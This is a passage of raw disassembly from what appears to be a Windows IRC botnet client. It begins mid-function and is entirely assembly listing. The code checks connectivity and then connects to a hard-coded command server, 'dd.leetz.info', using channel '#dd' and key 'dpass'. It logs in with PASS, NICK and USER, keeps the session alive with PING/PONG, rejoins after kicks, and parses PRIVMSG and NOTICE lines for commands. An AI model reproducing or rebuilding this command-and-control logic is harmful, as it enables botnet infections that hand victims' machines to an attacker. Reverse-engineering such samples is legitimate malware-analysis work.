push offset dword_46AE94
mov dword_46B004, ebx
call sub_416BE0
mov eax, dword_42C238
push 3Fh
mov edi, offset dword_46AF14
push offset aDd_0 ; "#dd"
push edi
mov dword_46AFE4, eax
call sub_416BE0
push 3Fh
mov esi, offset dword_46AF54
push offset aDpass ; "dpass"
push esi
call sub_416BE0
add esp, 48h
mov dword_46AFE8, ebx
loc_40C949: ; CODE XREF: sub_40C574+47B�j
; sub_40C574+486�j ...
mov [ebp+var_4], ebx
loc_40C94C: ; CODE XREF: sub_40C574+42F�j
cmp dword_43CB08, ebx
jnz short loc_40C96A
lea eax, [ebp+var_20]
push ebx
push eax
call dword_43C968 ; InternetGetConnectedState
test eax, eax
jnz short loc_40C96A
push 7530h
jmp short loc_40C996
; ---------------------------------------------------------------------------
loc_40C96A: ; CODE XREF: sub_40C574+3DE�j
; sub_40C574+3ED�j
push offset dword_46AE90
mov dword_46B000, ebx
call sub_40CA58
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40CA44
cmp dword_46B000, ebx
jz short loc_40C991
dec [ebp+var_4]
loc_40C991: ; CODE XREF: sub_40C574+418�j
push 0BB8h
loc_40C996: ; CODE XREF: sub_40C574+3F4�j
call dword_421060 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40C94C
cmp [ebp+var_8], 2
jz loc_40CA44
cmp [ebp+var_C], ebx
jz short loc_40C9F4
push 7Fh
push offset aDd_leetz_info ; "dd.leetz.info"
push offset dword_46AE94
call sub_416BE0
mov eax, dword_42C238
push 3Fh
push offset aDd_0 ; "#dd"
push edi
mov dword_46AFE4, eax
call sub_416BE0
push 3Fh
push offset aDpass ; "dpass"
push esi
call sub_416BE0
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40C949
; ---------------------------------------------------------------------------
loc_40C9F4: ; CODE XREF: sub_40C574+43E�j
cmp byte_42C298, bl
jz loc_40C949
push 7Fh
push offset byte_42C298
push offset dword_46AE94
call sub_416BE0
mov eax, dword_42C23C
push 3Fh
push offset dword_42C2A8
push edi
mov dword_46AFE4, eax
call sub_416BE0
push 3Fh
push offset aDpass_0 ; "dpass"
push esi
call sub_416BE0
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40C949
; ---------------------------------------------------------------------------
loc_40CA44: ; CODE XREF: sub_40C574+40C�j
; sub_40C574+435�j
call sub_414F9D
loc_40CA49: ; CODE XREF: sub_40C574+AE�j
; sub_40C574+BE�j
call dword_43C984 ; WSACleanup
loc_40CA4F: ; CODE XREF: sub_40C574+A1�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40C574 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA58 proc near ; CODE XREF: sub_40C574+401�p
; DATA XREF: sub_40CD3A+393F�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_40CA7D: ; CODE XREF: sub_40CA58+E6�j
; sub_40CA58+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call dword_43CA24 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_409F7A
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40CBBA
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_415390
push 0
lea eax, [ebp+var_2C]
push dword_46AFF8
push dword_42C260
push eax
call sub_414278
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_441BB0
push edi
push eax
call sub_416BE0
add esp, 28h
push 6
push 1
push 2
call dword_43CAA4 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_441BA4[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40CB43
push esi
call dword_43CABC ; closesocket
call sub_409FA3
push 7D0h
loc_40CB38: ; CODE XREF: sub_40CA58+146�j
call dword_421060 ; Sleep
jmp loc_40CA7D
; ---------------------------------------------------------------------------
loc_40CB43: ; CODE XREF: sub_40CA58+CD�j
lea eax, [ebp+var_18C]
push eax
push offset dword_433738
call sub_40B0EC
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40CBBE
add esp, 28h
mov edi, eax
push esi
call dword_43CABC ; closesocket
test edi, edi
jz loc_40CA7D
cmp edi, 1
jnz short loc_40CBA0
push 0DBBA0h
jmp short loc_40CB38
; ---------------------------------------------------------------------------
loc_40CBA0: ; CODE XREF: sub_40CA58+13F�j
cmp edi, 2
jnz loc_40CA7D
push [ebp+var_34]
call sub_4150F0
pop ecx
push edi
pop eax
loc_40CBB4: ; CODE XREF: sub_40CA58+164�j
pop edi
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_40CBBA: ; CODE XREF: sub_40CA58+5A�j
xor eax, eax
jmp short loc_40CBB4
sub_40CA58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CBBE proc near ; CODE XREF: sub_40CA58+123�p
var_1A10 = byte ptr -1A10h
var_A10 = byte ptr -0A10h
var_240 = byte ptr -240h
var_1A0 = byte ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call sub_415B90
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_1A0]
pop ecx
loc_40CBDC: ; CODE XREF: sub_40CBBE+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40CBDC
cmp byte_46AFFC, bl
jz short loc_40CC03
push offset byte_46AFFC
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_412B8B
add esp, 0Ch
loc_40CC03: ; CODE XREF: sub_40CBBE+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_414278
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_415316
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40CC6D
push [ebp+arg_0]
call dword_43CABC ; closesocket
push 1388h
call dword_421060 ; Sleep
loc_40CC66: ; CODE XREF: sub_40CBBE+D9�j
; sub_40CBBE+153�j
xor eax, eax
loc_40CC68: ; CODE XREF: sub_40CBBE+16F�j
; sub_40CBBE+177�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40CC6D: ; CODE XREF: sub_40CBBE+92�j
; sub_40CBBE+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A10]
push esi
push ebx
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_1A10]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_43CA3C ; recv
test eax, eax
jle short loc_40CC66
lea eax, [ebp+var_A10]
push eax
lea eax, [ebp+var_1A10]
push eax
call sub_409965
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40CC6D
lea edi, [ebp+var_A10]
loc_40CCBE: ; CODE XREF: sub_40CBBE+165�j
xor esi, esi
inc esi
loc_40CCC1: ; CODE XREF: sub_40CBBE+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_1A0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40CD3A
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40CD04
push 7D0h
call dword_421060 ; Sleep
jmp short loc_40CCC1
; ---------------------------------------------------------------------------
loc_40CD04: ; CODE XREF: sub_40CBBE+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40CD32
cmp esi, 0FFFFFFFEh
jz short loc_40CD2A
cmp esi, 0FFFFFFFFh
jz loc_40CC66
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_40CCBE
jmp loc_40CC6D
; ---------------------------------------------------------------------------
loc_40CD2A: ; CODE XREF: sub_40CBBE+14E�j
xor eax, eax
inc eax
jmp loc_40CC68
; ---------------------------------------------------------------------------
loc_40CD32: ; CODE XREF: sub_40CBBE+149�j
push 2
pop eax
jmp loc_40CC68
sub_40CBBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD3A proc near ; CODE XREF: sub_40CBBE+12A�p
var_27D4 = byte ptr -27D4h
var_23D4 = byte ptr -23D4h
var_21D4 = byte ptr -21D4h
var_1FD4 = byte ptr -1FD4h
var_1ED4 = byte ptr -1ED4h
var_1DD4 = byte ptr -1DD4h
var_1DD0 = byte ptr -1DD0h
var_1CD0 = dword ptr -1CD0h
var_1CCC = dword ptr -1CCCh
var_1CC8 = byte ptr -1CC8h
var_1C48 = byte ptr -1C48h
var_1BC8 = byte ptr -1BC8h
var_1B48 = byte ptr -1B48h
var_1AC8 = byte ptr -1AC8h
var_1A48 = dword ptr -1A48h
var_1A44 = dword ptr -1A44h
var_1A40 = dword ptr -1A40h
var_1A3C = dword ptr -1A3Ch
var_1A38 = byte ptr -1A38h
var_19B8 = byte ptr -19B8h
var_1938 = byte ptr -1938h
var_18B8 = byte ptr -18B8h
var_1838 = dword ptr -1838h
var_1834 = dword ptr -1834h
var_1830 = dword ptr -1830h
var_182C = dword ptr -182Ch
var_1828 = dword ptr -1828h
var_1824 = byte ptr -1824h
var_17A4 = byte ptr -17A4h
var_1724 = byte ptr -1724h
var_16A4 = dword ptr -16A4h
var_16A0 = dword ptr -16A0h
var_169C = dword ptr -169Ch
var_1698 = dword ptr -1698h
var_1694 = byte ptr -1694h
var_1690 = byte ptr -1690h
var_1590 = byte ptr -1590h
var_158C = byte ptr -158Ch
var_150C = byte ptr -150Ch
var_14CC = byte ptr -14CCh
var_143C = dword ptr -143Ch
var_1438 = dword ptr -1438h
var_1434 = dword ptr -1434h
var_1430 = dword ptr -1430h
var_142C = dword ptr -142Ch
var_1428 = byte ptr -1428h
var_1424 = dword ptr -1424h
var_1420 = byte ptr -1420h
var_13A0 = byte ptr -13A0h
var_1324 = byte ptr -1324h
var_129C = byte ptr -129Ch
var_1220 = dword ptr -1220h
var_121C = dword ptr -121Ch
var_1218 = dword ptr -1218h
var_1214 = byte ptr -1214h
var_1198 = dword ptr -1198h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = byte ptr -1184h
var_1104 = byte ptr -1104h
var_1084 = byte ptr -1084h
var_1004 = dword ptr -1004h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = dword ptr -0FECh
var_FE8 = dword ptr -0FE8h
var_FE0 = byte ptr -0FE0h
var_F60 = byte ptr -0F60h
var_EE0 = dword ptr -0EE0h
var_EDC = dword ptr -0EDCh
var_ED8 = dword ptr -0ED8h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC0 = dword ptr -0EC0h
var_EBC = byte ptr -0EBCh
var_DB8 = dword ptr -0DB8h
var_DB4 = byte ptr -0DB4h
var_D34 = byte ptr -0D34h
var_C35 = byte ptr -0C35h
var_C34 = byte ptr -0C34h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = dword ptr -0B2Ch
var_B28 = dword ptr -0B28h
var_B24 = dword ptr -0B24h
var_B20 = dword ptr -0B20h
var_B1C = dword ptr -0B1Ch
var_B18 = dword ptr -0B18h
var_B14 = dword ptr -0B14h
var_B10 = byte ptr -0B10h
var_A90 = dword ptr -0A90h
var_A8C = byte ptr -0A8Ch
var_A80 = byte ptr -0A80h
var_A7C = byte ptr -0A7Ch
var_A0C = byte ptr -0A0Ch
var_98C = dword ptr -98Ch
var_988 = dword ptr -988h
var_984 = dword ptr -984h
var_980 = dword ptr -980h
var_97C = byte ptr -97Ch
var_970 = byte ptr -970h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = dword ptr -860h
var_858 = byte ptr -858h
var_84C = dword ptr -84Ch
var_848 = byte ptr -848h
var_844 = byte ptr -844h
var_748 = byte ptr -748h
var_740 = byte ptr -740h
var_6C8 = dword ptr -6C8h
var_6C0 = dword ptr -6C0h
var_6BC = dword ptr -6BCh
var_6B8 = dword ptr -6B8h
var_6B4 = dword ptr -6B4h
var_6B0 = dword ptr -6B0h
var_6AC = dword ptr -6ACh
var_6A8 = byte ptr -6A8h
var_628 = byte ptr -628h
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_5A0 = dword ptr -5A0h
var_59C = dword ptr -59Ch
var_598 = dword ptr -598h
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = byte ptr -588h
var_578 = byte ptr -578h
var_4F8 = byte ptr -4F8h
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = byte ptr -43Ch
var_420 = dword ptr -420h
var_41C = byte ptr -41Ch
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_39C = byte ptr -39Ch
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_38C = dword ptr -38Ch
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = byte ptr -364h
var_33C = byte ptr -33Ch
var_31C = dword ptr -31Ch
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = byte ptr -2D8h
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = dword ptr -0CCh
var_C0 = byte ptr -0C0h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 27D4h
call sub_415B90
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2D8]
push ebx
push eax
mov [ebp+var_A8], 3
mov [ebp+var_10], ebx
mov [ebp+var_A4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_D8], ebx
call sub_415390
push 1Bh
lea eax, [ebp+var_43C]
push [ebp+arg_10]
push eax
call sub_416BE0
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_40D18F
push esi
lea eax, [ebp+var_21D4]
push ebx
push eax
call sub_415390
dec esi
lea eax, [ebp+var_21D4]
push esi
push [ebp+arg_0]
push eax
call sub_416BE0
lea eax, [ebp+var_21D4]
push offset asc_436BF4 ; " :"
push eax
call sub_4158E0
mov [ebp+var_C], eax
lea eax, [ebp+var_21D4]
push esi
push eax
lea eax, [ebp+var_23D4]
push eax
call sub_416BE0
mov esi, offset asc_426A34 ; " "
lea eax, [ebp+var_23D4]
push esi
push eax
call sub_416B3F
xor edi, edi
add esp, 34h
mov [ebp+var_94], eax
inc edi
loc_40CE00: ; CODE XREF: sub_40CD3A+DA�j
push esi
push ebx
call sub_416B3F
mov [ebp+edi*4+var_94], eax
inc edi
pop ecx
cmp edi, 20h
pop ecx
jl short loc_40CE00
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_40D18F
cmp [ebp+var_90], ebx
jz loc_40D18F
push 100h
lea eax, [ebp+var_960]
push ebx
push eax
call sub_415390
add esp, 0Ch
push 1Fh
pop edx
loc_40CE48: ; CODE XREF: sub_40CD3A+142�j
lea ecx, [ebp+edx*4+var_94]
mov eax, [ecx]
cmp eax, ebx
jz short loc_40CE7B
cmp byte ptr [eax], 2Dh
jnz short loc_40CE7E
cmp [eax+2], bl
jnz short loc_40CE7E
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40CE7B: ; CODE XREF: sub_40CD3A+119�j
dec edx
jns short loc_40CE48
loc_40CE7E: ; CODE XREF: sub_40CD3A+11E�j
; sub_40CD3A+123�j
xor edi, edi
inc edi
cmp [ebp+var_8ED], bl
jz short loc_40CE8C
mov [ebp+var_8], edi
loc_40CE8C: ; CODE XREF: sub_40CD3A+14D�j
cmp [ebp+var_8F2], bl
jz short loc_40CE9A
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40CE9A: ; CODE XREF: sub_40CD3A+158�j
cmp byte ptr [esi], 0Ah
jz short loc_40CED4
push 7Fh
lea eax, [ebp+var_B10]
push esi
push eax
call sub_416BE0
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_C0]
push eax
call sub_416BE0
lea eax, [ebp+var_C0]
push offset dword_42F650
push eax
call sub_416B3F
add esp, 20h
loc_40CED4: ; CODE XREF: sub_40CD3A+163�j
push esi
push offset aPing ; "PING"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40CF25
push [ebp+var_90]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_412B8B
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40CFC9
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_412B8B
add esp, 10h
jmp loc_40CFC9
; ---------------------------------------------------------------------------
loc_40CF25: ; CODE XREF: sub_40CD3A+1A9�j
mov esi, [ebp+var_90]
push esi
push offset a001 ; "001"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41299F
push esi
push offset a005 ; "005"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41299F
push esi
push offset a302 ; "302"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40CF90
push offset a@_6 ; "@"
push [ebp+var_88]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40CFC9
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_416BE0
add esp, 0Ch
jmp short loc_40CFC9
; ---------------------------------------------------------------------------
loc_40CF90: ; CODE XREF: sub_40CD3A+22A�j
push esi
push offset a433 ; "433"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40CFD0
push ebx
push dword_46AFF8
push dword_42C260
push [ebp+arg_10]
call sub_414278
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_412B8B
add esp, 1Ch
loc_40CFC9: ; CODE XREF: sub_40CD3A+1CA�j
; sub_40CD3A+1E6�j ...
mov eax, edi
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_40CFD0: ; CODE XREF: sub_40CD3A+265�j
mov esi, [ebp+arg_18]
mov [ebp+var_D4], 2
mov edi, 80h
loc_40CFE2: ; CODE XREF: sub_40CD3A+2CD�j
lea eax, [ebp+var_B10]
push eax
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40CFFF
mov [ebp+var_A4], 1
loc_40CFFF: ; CODE XREF: sub_40CD3A+2B9�j
add esi, edi
dec [ebp+var_D4]
jnz short loc_40CFE2
mov esi, [ebp+var_90]
push esi
push offset aKick ; "KICK"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D0E8
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 2
loc_40D02E: ; CODE XREF: sub_40CD3A+373�j
cmp [esi], bl
jz short loc_40D0A8
push 7Fh
lea eax, [ebp+var_B10]
push esi
push eax
call sub_416BE0
add esp, 0Ch
cmp [ebp+var_88], ebx
jz short loc_40D0A8
push [ebp+var_88]
lea eax, [ebp+var_C0]
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40D0A8
lea eax, [ebp+var_C0]
mov [esi], bl
push eax
lea eax, [ebp+var_2D8]
push offset dword_436B80
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_412B8B
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
add esp, 20h
loc_40D0A8: ; CODE XREF: sub_40CD3A+2F6�j
; sub_40CD3A+310�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40D02E
push [ebp+var_88]
push [ebp+arg_10]
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D18F
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_40D0DB: ; CODE XREF: sub_40CD3A+5D6�j
; sub_40CD3A+918�j
push [ebp+arg_4]
call sub_412B8B
jmp loc_412188
; ---------------------------------------------------------------------------
loc_40D0E8: ; CODE XREF: sub_40CD3A+2E4�j
push esi
push offset aNick ; "NICK"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D224
mov eax, [ebp+var_8C]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 2
mov [ebp+arg_24], eax
loc_40D111: ; CODE XREF: sub_40CD3A+429�j
lea eax, [ebp+var_B10]
push eax
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40D15E
lea eax, [ebp+var_B10]
push 21h
push eax
call sub_416F20
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_40D15E
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_415A20
push [ebp+arg_1C]
push edi
call sub_415A30
add esp, 10h
mov edi, 80h
loc_40D15E: ; CODE XREF: sub_40CD3A+3E8�j
; sub_40CD3A+3FF�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_40D111
cmp [ebp+arg_24], ebx
jz short loc_40D18F
push [ebp+arg_10]
lea eax, [ebp+var_C0]
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40D197
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_416BE0
add esp, 0Ch
loc_40D18F: ; CODE XREF: sub_40CD3A+5B�j
; sub_40CD3A+E4�j ...
xor eax, eax
inc eax
loc_40D192: ; CODE XREF: sub_40CD3A+291�j
; sub_40CD3A+281F�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D197: ; CODE XREF: sub_40CD3A+443�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40D19C: ; CODE XREF: sub_40CD3A+483�j
cmp [edi], bl
jz short loc_40D1B3
lea eax, [ebp+var_B10]
push eax
push edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40D1C1
loc_40D1B3: ; CODE XREF: sub_40CD3A+464�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40D19C
jmp short loc_40D18F
; ---------------------------------------------------------------------------
loc_40D1C1: ; CODE XREF: sub_40CD3A+477�j
lea eax, [ebp+var_B10]
push 21h
push eax
call sub_416F20
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz short loc_40D18F
push eax
call sub_415B10
push [ebp+arg_24]
mov edi, eax
call sub_415B10
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_40D18F
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi
call sub_415316
push ebx
lea eax, [ebp+var_33C]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_412BD1
add esp, 24h
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_40D224: ; CODE XREF: sub_40CD3A+3BD�j
push esi
push offset aPart ; "PART"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40D246
push esi
push offset aQuit ; "QUIT"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40D26D
loc_40D246: ; CODE XREF: sub_40CD3A+4F9�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40D24B: ; CODE XREF: sub_40CD3A+531�j
cmp [edi], bl
jz short loc_40D261
push [ebp+var_94]
push edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40D2B4
loc_40D261: ; CODE XREF: sub_40CD3A+513�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40D24B
loc_40D26D: ; CODE XREF: sub_40CD3A+50A�j
push [ebp+var_90]
push offset a353 ; "353"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D315
push [ebp+var_84]
push [ebp+arg_8]
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40D2A4
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40D2A4: ; CODE XREF: sub_40CD3A+55F�j
push [ebp+var_84]
push offset dword_436B20
jmp loc_412993
; ---------------------------------------------------------------------------
loc_40D2B4: ; CODE XREF: sub_40CD3A+525�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2D8]
push offset dword_436AEC
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
push [ebp+var_90]
push offset aPart ; "PART"
call sub_415730
add esp, 18h
test eax, eax
jnz loc_40D18F
lea eax, [ebp+var_2D8]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_40D0DB
; ---------------------------------------------------------------------------
loc_40D315: ; CODE XREF: sub_40CD3A+547�j
push [ebp+var_90]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_415730
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40D369
push [ebp+var_90]
push edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40D369
push [ebp+var_90]
push offset dword_436AD8
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_412818
cmp dword_42C250, ebx
jz loc_412818
loc_40D369: ; CODE XREF: sub_40CD3A+5F5�j
; sub_40CD3A+607�j
push [ebp+var_90]
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40D4E2
push [ebp+var_90]
push edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40D4E2
mov eax, [ebp+var_88]
inc [ebp+var_84]
mov [ebp+var_A8], 4
mov [ebp+var_8C], eax
loc_40D3B1: ; CODE XREF: sub_40CD3A+867�j
; sub_40CD3A+8ED�j ...
mov eax, [ebp+var_A8]
mov esi, eax
shl esi, 2
lea edi, [ebp+esi+var_94]
mov eax, [edi]
push eax
push offset dword_436AD0
mov [ebp+arg_8], eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D7CB
push [ebp+esi+var_90]
